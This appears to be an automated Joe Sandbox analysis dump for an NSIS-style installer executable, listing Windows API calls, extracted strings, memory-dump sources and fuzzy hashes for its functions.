                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F7B
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404F86
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FD0
                                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FE7
                                                        • SetWindowLongW.USER32(?,000000FC,00405570), ref: 00405000
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00405014
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405026
                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 0040503C
                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405048
                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040505A
                                                        • DeleteObject.GDI32(00000000), ref: 0040505D
                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405088
                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405094
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040512F
                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040515F
                                                          • Part of subcall function 0040452B: SendMessageW.USER32(00000028,?,00000001,00404356), ref: 00404539
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405173
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004051A1
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004051AF
                                                        • ShowWindow.USER32(?,00000005), ref: 004051BF
                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 004052BA
                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040531F
                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405334
                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405358
                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405378
                                                        • ImageList_Destroy.COMCTL32(?), ref: 0040538D
                                                        • GlobalFree.KERNEL32(?), ref: 0040539D
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405416
                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 004054BF
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054CE
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004054F9
                                                        • ShowWindow.USER32(?,00000000), ref: 00405547
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405552
                                                        • ShowWindow.USER32(00000000), ref: 00405559
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 2564846305-813528018
                                                        APIs
                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404753
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404767
                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404784
                                                        • GetSysColor.USER32(?), ref: 00404795
                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004047A3
                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004047B1
                                                        • lstrlenW.KERNEL32(?), ref: 004047B6
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047C3
                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047D8
                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404831
                                                        • SendMessageW.USER32(00000000), ref: 00404838
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404863
                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004048A6
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004048B4
                                                        • SetCursor.USER32(00000000), ref: 004048B7
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004048D0
                                                        • SetCursor.USER32(00000000), ref: 004048D3
                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404902
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404914
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: ,F@$Call$N
                                                        • API String ID: 3103080414-1948516150
                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406358,?,?), ref: 004061F8
                                                        • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 00406201
                                                          • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                          • Part of subcall function 00405FCC: lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                        • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 0040621E
                                                        • wsprintfA.USER32 ref: 0040623C
                                                        • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406277
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406286
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004062BE
                                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406314
                                                        • GlobalFree.KERNEL32(00000000), ref: 00406325
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040632C
                                                          • Part of subcall function 00406067: GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\Desktop\QNuQ5e175D.exe,80000000,00000003), ref: 0040606B
                                                          • Part of subcall function 00406067: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %ls=%ls$[Rename]
                                                        • API String ID: 2171350718-461813615
                                                        APIs
                                                        • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                        • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                        • CharNextW.USER32(?,"C:\Users\user\Desktop\QNuQ5e175D.exe",756F3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                        • CharPrevW.USER32(?,?,756F3420,C:\Users\user\AppData\Local\Temp\,00000000,0040352D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                        Strings
                                                        • "C:\Users\user\Desktop\QNuQ5e175D.exe", xrefs: 00406869
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406826
                                                        • *?|<>/":, xrefs: 00406877
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\QNuQ5e175D.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-13023802
                                                        APIs
                                                        • GetWindowLongW.USER32(?,000000EB), ref: 0040457A
                                                        • GetSysColor.USER32(00000000), ref: 004045B8
                                                        • SetTextColor.GDI32(?,00000000), ref: 004045C4
                                                        • SetBkMode.GDI32(?,?), ref: 004045D0
                                                        • GetSysColor.USER32(?), ref: 004045E3
                                                        • SetBkColor.GDI32(?,?), ref: 004045F3
                                                        • DeleteObject.GDI32(?), ref: 0040460D
                                                        • CreateBrushIndirect.GDI32(?), ref: 00404617
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                        • Instruction ID: 3bf72a8e0ffa46ee4049c610ab3cabbd6d50cfb344f29d4a8179c655b9565abb
                                                        • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                        • Instruction Fuzzy Hash: 5C2165B1500B04ABC7319F38DE08B577BF4AF41715F04892EEA96A26E0D739D944CB54
                                                        APIs
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B025C2
                                                          • Part of subcall function 73B012CC: lstrcpynW.KERNEL32(00000000,?,73B0137F,00000019,73B011CA,-000000A0), ref: 73B012DC
                                                        • GlobalAlloc.KERNEL32(00000040), ref: 73B02548
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73B02563
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                        • String ID: @Hxv
                                                        • API String ID: 4216380887-2589555886
                                                        • Opcode ID: edf46bf865ca836839d8b2610bfbae5fa230864a08944080cc65a43ce577090b
                                                        • Instruction ID: 44206d4262fdd86489251007a9cfb8268f098ca7fa9391debde2988d7d775d37
                                                        • Opcode Fuzzy Hash: edf46bf865ca836839d8b2610bfbae5fa230864a08944080cc65a43ce577090b
                                                        • Instruction Fuzzy Hash: 9441B2B1008309DFE724EF65D990B2A7FB8FB94314F20853DE94A8B681F730A548CB61
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404ECC
                                                        • GetMessagePos.USER32 ref: 00404ED4
                                                        • ScreenToClient.USER32(?,?), ref: 00404EEE
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404F00
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F26
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                        • Instruction ID: fe1e2a7802b6c51c8f018a14413b1ee553013da7dc16083b389f375565560bf3
                                                        • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                        • Instruction Fuzzy Hash: 20015E71900219BADB00DB94DD85BFEBBBCAF95711F10412BBB51B61D0C7B4AA418BA4
                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401E76
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                        • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401EF8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID: Times New Roman
                                                        • API String ID: 3808545654-927190056
                                                        • Opcode ID: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                        • Instruction ID: 32ce691c062fdf7882ca7c79f7dc95dd78c7e40f541a0607bb82830de01dd458
                                                        • Opcode Fuzzy Hash: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                        • Instruction Fuzzy Hash: 3C017171905250EFE7005BB4EE49BDD3FA4AB19301F208A7AF142B61E2CBB904458BED
                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                        • MulDiv.KERNEL32(0008E45C,00000064,0008ED68), ref: 00403001
                                                        • wsprintfW.USER32 ref: 00403011
                                                        • SetWindowTextW.USER32(?,?), ref: 00403021
                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                        Strings
                                                        • verifying installer: %d%%, xrefs: 0040300B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: verifying installer: %d%%
                                                        • API String ID: 1451636040-82062127
                                                        • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                        • Instruction ID: de78d71e2fb772fb87643f85aa6fa794cb5f2d0f129fd79c7e15704eeb750e6f
                                                        • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                        • Instruction Fuzzy Hash: 85014F71640208BBEF209F60DD49FEE3B79AB04344F008039FA02B51D0DBB996559B59
                                                        APIs
                                                          • Part of subcall function 73B012BB: GlobalAlloc.KERNELBASE(00000040,?,73B012DB,?,73B0137F,00000019,73B011CA,-000000A0), ref: 73B012C5
                                                        • GlobalFree.KERNEL32(?), ref: 73B02743
                                                        • GlobalFree.KERNEL32(00000000), ref: 73B02778
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc
                                                        • String ID:
                                                        • API String ID: 1780285237-0
                                                        • Opcode ID: 186ac7162cade3a1f7d8ec37e9420d486dbd8699fb215bcafbdfc0bb6662422b
                                                        • Instruction ID: 572ef8a273f600c9bb1869a8aaf83870e4022627f361d04f665ffb4d902b2c65
                                                        • Opcode Fuzzy Hash: 186ac7162cade3a1f7d8ec37e9420d486dbd8699fb215bcafbdfc0bb6662422b
                                                        • Instruction Fuzzy Hash: F431F2B2504109EFE7269F65CBC4F2E7FBAFB853087245539F2459BA60E7309C088B61
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                        • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                        • Instruction ID: fd7949a1005e62e73a365a75524f2bbb059e9229dbd09bef2f8decdc6a7611be
                                                        • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                        • Instruction Fuzzy Hash: FA31A271D00124BBCF21AFA5CE89D9E7E79AF45324F14423AF421762E1CB798D418FA8
                                                        APIs
                                                          • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,?,00405F65,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405EFF
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F04
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F1C
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe"), ref: 00405FA7
                                                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsj924C.tmp,C:\Users\user\AppData\Local\Temp\nsj924C.tmp, 4ou,?,C:\Users\user\AppData\Local\Temp\,00405CA3,?,756F3420,C:\Users\user\AppData\Local\Temp\), ref: 00405FB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532358270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1532379838.0000000000464000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: 4ou$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsj924C.tmp
                                                        • API String ID: 3248276644-44708928
                                                        • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                        • Instruction ID: 6a7a19aedd3560da6e477bd72522a8c235124595f9c35bb96c459409ca5d5c37
                                                        • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                        • Instruction Fuzzy Hash: 28F0F42A105E6369C622333A5C05AAF1954CE86324B5A453FBC91F22C5CF3C8A42CDBE
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1569059369.0000000073B01000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B00000, based on PE: true
                                                        • Associated: 00000000.00000002.1568940355.0000000073B00000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000000.00000002.1569611314.0000000073B04000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000000.00000002.1569637966.0000000073B06000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_73b00000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: FreeGlobal
                                                        • String ID:
                                                        • API String ID: 2979337801-0
                                                        • Opcode ID: 17cc290bfc7daee4a97d9f56303a64d15ab38b1c41cf57a17b7758b6ebd01c3f
                                                        • Instruction ID: ae383de39c2ddf217f3aebf65d6aa6b561e3a58ed3b1dd9c04db493191ebb3ef
                                                        • Opcode Fuzzy Hash: 17cc290bfc7daee4a97d9f56303a64d15ab38b1c41cf57a17b7758b6ebd01c3f
                                                        • Instruction Fuzzy Hash: 3D51F67ED00118ABEB1E9FA4C5407AE7FBAFBC4344F04817AD506B3290F771AA458791
                                                        APIs
                                                        • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                        • GetClientRect.USER32(?,?), ref: 00401E0A
                                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                        • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1532332230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1532275163.0000000000400000.00000002.00000001.01000000.00000003.sdmp
